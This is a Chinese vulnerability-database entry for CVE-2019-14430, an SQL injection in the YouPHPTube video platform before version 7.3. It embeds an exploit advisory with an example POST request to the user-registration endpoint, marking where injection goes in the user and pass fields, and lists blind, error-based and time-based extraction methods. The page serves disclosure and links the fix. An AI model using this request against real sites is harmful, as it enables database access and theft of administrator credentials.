YouPHPTube SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1708184 漏洞类型 SQL注入
发布时间 2019-08-20 更新时间 2019-08-27
CVE编号 CVE-2019-14430 CNNVD-ID CNNVD-201908-1288
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019080081
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201908-1288
|漏洞详情
YouPHPTube是一套基于PHP的视频网站系统。 YouPHPTube 7.2版本中的plugin/Audit/Objects/AuditTable.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
|漏洞EXP
# Exploit Title: YouPHPTube < 7.3 SQL Injection
# Google Dork: /
# Date: 19.08.2019
# Exploit Author: Fabian Mosch, r-tec IT Security GmbH
# Vendor Homepage: https://www.youphptube.com/
# Software Link: https://github.com/YouPHPTube/YouPHPTube
# Version: < 7.3
# Tested on: Linux/Windows
# CVE : CVE-2019-14430

The parameters "User" as well as "pass" of the user registration function are vulnerable to SQL injection vulnerabilities. By submitting an HTTP POST request to the URL "/objects/userCreate.json.php" an attacker can access the database and read the hashed credentials of an administrator for example.

Example Request:

POST /objects/userCreate.json.php HTTP/1.1
Host: vulnerablehost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
[SomeHeaders and Cookies]

user=tes'INJECTHERE&pass=test'INJECTHERE &email=test%40example.com&name=test&captcha=xxxxx

Methods for DB-Extraction are:


- Boolean-based blind

- Error-based

- AND/OR time-based blind


The vulnerability was fixed with this commit:
https://github.com/YouPHPTube/YouPHPTube/commit/891843d547f7db5639925a67b7f2fd66721f703a
|参考资料

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/154145/YouPHPTube-7.2-SQL-Injection.html


来源:www.exploit-db.com

链接:https://www.exploit-db.com/exploits/47294